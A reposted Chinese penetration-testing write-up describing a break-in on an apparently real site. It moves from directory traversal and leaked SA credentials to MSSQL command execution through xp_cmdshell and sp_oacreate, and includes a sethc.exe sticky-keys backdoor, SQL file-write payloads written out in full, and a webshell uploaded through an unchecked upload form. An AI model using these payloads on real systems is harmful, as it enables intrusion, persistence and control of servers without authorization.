前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >实战-站库分离拿下WebShell

实战-站库分离拿下WebShell

作者头像
重生信息安全
发布2020-12-16 10:49:47
2.3K0
发布2020-12-16 10:49:47
举报
文章被收录于专栏:重生信息安全重生信息安全

一、目录遍历

在对目标进行目录扫描的时候,发现其app目录存在目录遍历。

在目录中发现了app的备份文件,在备份中找到了其数据库文件

竟然使用的是sa账户连接的!!!

主站无CDN,且IP地址与数据库配置文件中的IP不一致,典型的站库分离。

现在有Sa的账号密码,先从数据库开始渗透。

2、Mssql渗透

(1)Xp_cmdshell

使用sqlmap 直连数据库

sqlmap -d "db_type://user:pwd@ip:port/db" command

无法执行命令也没有回显,但是得到其版本为2000。

尝试连接数据库手动执行命令。

Navicat不支持连接Mssql2000,这里改用Database4来连接。

Mssql2005及以上版本默认关闭Xp_cmdshell,2000可以直接调用Xp_cmdshell执行命令。

连上之后执行命令报错了,

查了一下可能是因为数据库没权限创建Cmd进程。

(2)Sp_oacreate执行命令

sp_oacreate的劣勢是沒有回显,但是可以将命令的输出写到文件,我们再读取文件即可。

找到了Sp_oacreate两种执行命令的方式

declare @o int
exec sp_oacreate 'Shell.Application', @o out
exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd
/c whoami >e:\test.txt','c:\windows\system32','','1';

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami > c:\\1.txt'

在这里执行这两条命令,都会直接卡死,估计是被拦了。

(3)Sp_oacreate粘贴键替换调用Cmd

这种方式等于是做了一个shift后门。

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe'
,'c:\windows\system32\sethc.exe';


declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe'
,'c:\windows\system32\dllcache\sethc.exe';

语句可以成功執行,但是调不出来,未知原因。

(4)Sp_oacreate读写文件

这个功能

在有Web服务的时候很好用

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'e:\tmp1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'tes1t'

查看目录结构

execute master..xp_dirtree 'e:\',1,1

查看文件内容

表名不能重复,查一次换一次表名。

3、代码审计

代码审计过程中,在源码中找到一个Upload功能,对上传文件没有做任何防护。会直接将上传的文件,上传到http://主站IP:8082/upload下。

构造html上传页面,并将其提交到app目录下的这个upload.php文件即可。

先上传一个正常"萨斯该"的图片

这里有个坑,他给的路径是错的直接访问找不到。最后在主站下边的这个app目录下找到了

上传Webshell,刚上传一句话木马被杀了。

以为php不能上传,上传了个phpinfo可以执行,改上传冰蝎的马成功Getshell。

文章首发:先知社区 未经作者允许禁止转载

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-12-08,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 重生信息安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 一、目录遍历
    • 在对目标进行目录扫描的时候,发现其app目录存在目录遍历。
      • 2、Mssql渗透
    • 查看文件内容
      • 3、代码审计
相关产品与服务
命令行工具
腾讯云命令行工具 TCCLI 是管理腾讯云资源的统一工具。使用腾讯云命令行工具,您可以快速调用腾讯云 API 来管理您的腾讯云资源。此外,您还可以基于腾讯云的命令行工具来做自动化和脚本处理,以更多样的方式进行组合和重用。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档